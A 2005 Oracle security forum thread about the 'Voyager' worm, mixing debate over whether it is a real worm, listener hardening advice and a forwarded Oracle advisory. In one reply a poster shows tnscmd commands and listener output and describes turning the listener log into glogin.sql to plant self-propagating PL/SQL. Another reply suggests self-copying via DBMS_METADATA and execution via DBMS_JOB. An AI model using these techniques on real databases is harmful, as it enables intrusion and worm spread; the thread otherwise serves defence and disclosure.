Pete Finnigan's Oracle Security Forum

Forum

Home/Forum

Welcome, Guest. Please Login. Nov 21^st, 2024, 2:25pm News: If you would like to register contact the forum admin
Home \| Help \| Search \| Members \| Login

   Pete Finnigan's Oracle Security Forum
   Oracle Security
   Oracle Security (Moderator: Pete Finnigan)
   Oracle Voyager Worm

« Previous topic | Next topic »

Pages: 1 2

Reply | Notify of replies | Send Topic | Print

Author

Topic: Oracle Voyager Worm (Read 23250 times)

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Oracle Voyager Worm
« on: Nov 1^st, 2005, 7:22am »

Quote | Modify

Hello

Yesterday an anonymous poster released the source for an Oracle worm called "Voyager" on the full disclosure mailing list.

http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038290.h tml

The analysis of the worm and some countermeasures are available on my website:

If your database is hardened the worm will not work.

Regards

Alexander Kornbrust

---
Red-Database-Security GmbH

IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #1 on: Nov 1^st, 2005, 2:03pm »

Quote | Modify

Alexander,

What do you mean in step 5 (protection) by :
"On Oracle 10g always disable local OS authentication and use a strong password instead."

Do you refer to the listener password or oracle account passwords?
If you refer to the listener password: how do you disable local OS authentication?

Ivan

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #2 on: Nov 1^st, 2005, 8:49pm »

Quote | Modify

Ivan

I am referring to the TNS listener password. I found a possiblity to circumvent the local OS authentication (Already reported to Oracle, Oracle bugid: 6454409).

If you use a password protected listener (with a strong password) your systems are safe (AFAIK).

Set the following value in the listener.ora and restart the listener.
LOCAL_OS_AUTHENTICATION_<LISTENER_NAME> = OFF

Hope this helps...

Regards

Alexander

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #3 on: Nov 1^st, 2005, 9:44pm »

Quote | Modify

Alexander,

Thank you. I did not know the LOCAL_OS_AUTHENTICATION parameter.

regards,

Ivan

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #4 on: Nov 2^nd, 2005, 8:21pm »

Quote | Modify

Alexander,

I think the "proof-of-conecpt" worm is based on the tnscmd.pl tool and it can't work with against a 10G oracle databases because the TNS header has changed. Using ethereal I've changed tnscmd.pl to work against 10G listeners. Maybe it is off-topic but if people want to play with the "proof-of-concept" worm they have to change the "vRequest" string in the worms code to experiment with 10G databases. If someone wants my adapted version of tnscmd.pl let me know and I'll send it to you.

Ivan

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #5 on: Nov 4^th, 2005, 3:18am »

Quote | Modify

It may not be good behaviour to criticize one's host, but I don't understand the lapse of judgement that resulted in describing Voyager a worm.

According to both wikipedia and FOLDOC a worm needs to be self propagating, which Voyager is not.

IMHO, Voyager is not a breakthrough, proof-of-concept worm. Rather Voyager is a very limited and poorly written scanner, which has recieved far more notice than it deserves. We should speak no more of Voyager: There are a number of better scanners available for download from this site.

Steven

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #6 on: Nov 4^th, 2005, 9:12am »

Quote | Modify

Ensslen,

Don't be afraid of criticize.
Don't forget it is a proof-of-concept worm. It can easily be adapted to be self propagated. I agree that there are many requirements to be met before such a worm could be effective:
1) the use of default passwords (i read somewhere an article in which Alexander says that at least 60 percent of all customers have at least a few databases with default passwords!),
2) find a default uc/password combination with enough orivileges to make it self-propagating,
3) an unprotected listener (if people still have default passwords the chances they have unprotected listeners is big),

If 1 is met but 2 is not then you could still use 3 to make
the worm self-propagating:

If they have an unprotected listener then instead of just using it to discover instances you could use it to adapt the glogin.sql for example. Let me show how you can do it with tnscmd.pl:

Code:

oracle@Asus:~/Worm > ./tnscmd10g.pl status -h 10.0.0.153 --10G --indent
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)( ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to 10.0.0.153:1521
writing 181 bytes
reading
.M.......9.........-. ..........
DESCRIPTION=
TMP=
VSNNUM=169869568
ERR=0

.
........
DESCRIPTION=
TMP=
VSNNUM=169869568
ERR=0
ALIAS=LISTENER
SECURITY=OFF
VERSION=TNSLSNR for Linux: Version 10.2.0.1.0 - Production
START_DATE=04-NOV-2005 09:34:03
SIDNUM=1
LOGFILE=/u01/app/oracle/product/10r2/db_1/network/log/listener.log
PRMFILE=/u01/app/oracle/product/10r2/db_1/network/admin/listener.ora
TRACING=off
UPTIME=4433
SNMP=OFF
PID=13232
START_DATE_NUM=2005-11-04 09:34:03

From the above information I know where to find the glogin.sql file: in /u01/app/oracle/product/10r2/db_1/sqlplus/admin/glogin.sql
The above listener is using the default location for the LOGFILE.
Using the same tnscmd tool I can reset the listeners LOGFILE to .../glogin.sql and then I can use tnscmd to fill the glogin.sql with the statements to propagate the worm:

Code:

tnscmd10g.pl -h 10.0.0.151 --10G --rawcmd "(CONNECT_DATA=((<here your pl/sql code to propagate>"

After creating and filling glogin.sql I can reset the LOGIFLE to it's original value.
The site is now infected with code to make the worm propagate itself.
The code that is used by tnscmd is allready inside the "proof-of-concept" worm (except for the adaptations needed by 10G).
Another adaptation would be the correct calculation of the
subnetmask to scan all the systems in the network.
To make it jump to an external network seems very difficult. You hardly see db-links between organizations. But most organizations have many databases.
My conclusion is that this proof-of-concept worm deserves to be discussed.

Ivan

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #7 on: Nov 4^th, 2005, 6:02pm »

Quote | Modify

ISaez,

I am not trying to challenge anyone, I'm just trying to clarify.

I agree that there are many different ways of hacking Oracle Databases, and that these can be used to create worms. I also agree that the technique that you describe in your most recent post could be used to make a worm.

I may be stubborn, but none of this is news. That Oracle databases have exploits is well publicized. That these exploits could be scripted into a worm is common sense. But Voyager does not prove the concept.

Steven

(And I would caution you to be careful with what you post. The courts in many jurisdictions are technophobic and may not distinguish between explaining worms and encouraging their development.)

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #8 on: Nov 4^th, 2005, 6:21pm »

Quote | Modify

Steven,

I think the concept of a Oracle Worm is new. But it is my opinion and if you don't agree then I respect that.

Thank you for you warning but everything I've posted is of public knowledge so I am not disclosing anything.

Ivan

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #9 on: Nov 4^th, 2005, 7:03pm »

Quote | Modify

Hi Guys,

The post says that it is incomplete and alright it is not actually a worm as it doesn't replicate but the concept is there to show that it is possoble to create an Oracle based worm in a similar veign to the slammer worm that plagued SQL Server.

I think it is valid to describe it as a worm as it is a concept only. The other thing to remember is that currently - in my opinion - a slammer type worm could not plague Oracle systems to the same effect as slammer did simply because there is only a fraction of the number of Oracle databases exposed to the net than there was SQL databases.

cheers

Pete

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Advice regarding the so-called Oracle Voyager Wor
« Reply #10 on: Nov 5^th, 2005, 7:42am »

Quote | Modify

Today I've got this email from Oracle.

Regards
Alex

-----Ursprüngliche Nachricht-----
Von: Oracle Global Product Security [mailto:replies@oracle-mail.com]
Gesendet: Samstag, 5. November 2005 06:23
An: Kornbrust, Alexander
Betreff: Advice regarding the so-called ¿Oracle Voyager Worm¿

Dear Oracle customer,

Oracle Global Product Security has investigated the recent Internet publication of the so-called ¿Oracle Voyager Worm¿ that is designed to target Oracle databases. In its current form, the code is incomplete and poses no immediate threat to Oracle customers. The code does not expose or attempt to exploit an Oracle product security vulnerability. Instead, the code outlines an attack against Oracle database systems that have been configured insecurely.

Oracle considers adherence to industry standard security practices the best way for customers to protect their database systems. A MetaLink note is now available that outlines the minimum essential steps customers should take to mitigate future attempted attacks against their Oracle databases. Customers who already follow industry standard security best practices, including those who have hardened or locked down their database systems, may still benefit from reviewing the MetaLink note.

The MetaLink Doc ID is 340009.1:
http://metalink.oracle.com/metalink/plsql/showdoc?db=NOT&id=340009.1

Additional references:
http://www.oracle.com/technology/deploy/security/db_security/index.html

http://www.oracle.com/technology/deploy/security/pdf/twp_security_checkl ist_db_database.pdf

Sincerely,
Oracle Global Product Security

PLEASE DO NOT REPLY TO THIS E-MAIL. This address is not monitored.
******************

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #11 on: Nov 6^th, 2005, 11:30pm »

Quote | Modify

It seems (to me) to be a valid proof of concept. Admittedly, the code currently written only attempts to create a table at the end of the DB link, but using DBMS_METADATA (or even simply selecting from user_source) it could easily re-extract its own source code and so create a copy of itself at the destination.

The only other major missing component of the worm is that it doesn't attempt to execute anything. A worm should not only try to copy itself but try to get that copy running. DBMS_JOB is the obvious mechanism, and is a prime candidate for lockdown.

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Advice regarding the so-called Oracle Voyager
« Reply #12 on: Nov 7^th, 2005, 8:02am »

Quote | Modify

on Nov 5^th, 2005, 7:42am, kornbrust wrote:

To which "industry standard security best practices" is Oracle refering?

Ivan

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #13 on: Nov 7^th, 2005, 2:45pm »

Quote | Modify

Hi Ivan,

This is an interesting point that you have raised. I am not aware of an industry standard for securing Oracle except perhaps my book or the SANS course or the CIS benchmark. I guess that they might be referring to more high level practices such as least privilege principals, security in depth etc.

I talked about the same issue in this forum some time ago and also in my blog - the issue of creating an open standard for securing an Oracle database. I have installed a wiki on this site. It needs some initial configuration and then we can get going. I think that it would be a worthwhile endeavor to produce a list of issues, vulnerabilities, configuration issues, bugs and best practices etc. My idea was to have a main page and then the categories such as configuration, bugs, bext practices, privileges, OS issues, network issues etc. Then each category would list each separate issue and each would have their own page with a short description, fix, issue, what tools already check for the issues and so on.

My final thought was to then be able to collate a complete checklist from this / or a standard for hardeing or building Oracle. I chose to use a wiki so that others can collaborate and add to it.

cheers

pete

IP Logged

Pete Finnigan
PeteFinnigan.com Administrator

Oracle Security is easier if you design for it

View Profile | WWW | Email

Gender: male

Posts: 309

Re: Oracle Voyager Worm
« Reply #14 on: Jan 22^nd, 2008, 1:49pm »

Quote | Modify

hi ivan

I need help you

I work with oracle 10g. when i use "tnscmd10g status ... " i see "ERROR=(CODE=12618" .

please help me to change tnscmd10g for work with oracle 10g

tanks

ghassem
g.koolivand@gmail.com

IP Logged

Pages: 1 2

Reply | Notify of replies | Send Topic | Print


« Previous topic \| Next topic »

PFCLScan
Simply connect PFCLScan to your Oracle database and it will automatically discover the security issues that could make your Oracle database vulnerable to attack and to the potential loss of your data.

Learn more
PFCLObfuscate
PFCLObfuscate is the only tool available that can automatically add license controls to your PL/SQL code. PFCLObfuscate protects your Intellectual Property invested in your PL/SQL database code.

Learn more
PFCLCode
PFCLCode is a tool to allow you to analyse your PL/SQL code for many different types of security issues. PFCLCode gives you a detailed review and reports and includes a powerful colour syntax highlighting code editor

Learn more
PFCLForensics
PFCLForensics is the only tool available to allow you to do a detailed live response of a breached Oracle database and to then go on and do a detailed forensic analysis of the data gathered.

Learn more
PFCLReselling
PeteFinnigan.com Limited has partnered with a small number of relevant companies to resell their products where they enhance or compliment what we do

Learn more
PFCLATK
PFCLATK is a toolkit that allows detailed pre-defined policy driven audit trails for your Oracle database. The toolkit also provides for a centralised audit trail and centralised activity reporting

Learn more
PFCLCookie
PFCLCookie is a useful tool to use to audit your websites for tracking cookies. Scan websites in a natural way using powerful browser driven scanner

Learn more
PFCLTraining
PFCLTraining is a set of expert training classes for you, aimed at teaching how to audit your own Oracle database, design audit trails, secure code in PL/SQL and secure and lock down your Oracle database.

Learn more
PFCLServices
Choose PFCLServices to add PeteFinnigan.com Ltd to your team for your Oracle Security needs. We are experts in performing detailed security audits, data security design work and policy creation

Learn more
PFCLConsulting
Choose PFCLConsulting to ask PeteFinnigan.com Limited to set up and use our products on your behalf

Learn more
PFCLCustom
All of our software products can be customised at a number of levels. Choose this to see how our products can be part of your products and services

Learn more
PFCLCloud
Private cloud, public cloud, hybrid cloud or no cloud. Learn how all of our services, trainings and products will work in the cloud

Learn more
PFCLUserRights
PFCLUserRights allows you to create a very detailed view of database users rights. The focus of the reports is to allow you to decide what privileges and accounts to keep and which to remove.

Learn more
PFCLSTK
PFCLSTK is a toolkit application that allows you to provide database security easily to an existing database. PFCLSTK is a policy driven toolkit of PL/SQL that creates your security

Learn more
PFCLSFTK
PFCLSFTK is a toolkit that solves the problem of securing third party applications written in PL/SQL. It does this by creating a thin layer between the application and database and this traps SQL Injection attempts. This is a static firewall.

Learn more
PFCLSEO
PFCLSEO is a web scanner based on the PFCLScan technology so that a user can easily scan a website for technical SEO issues

Learn more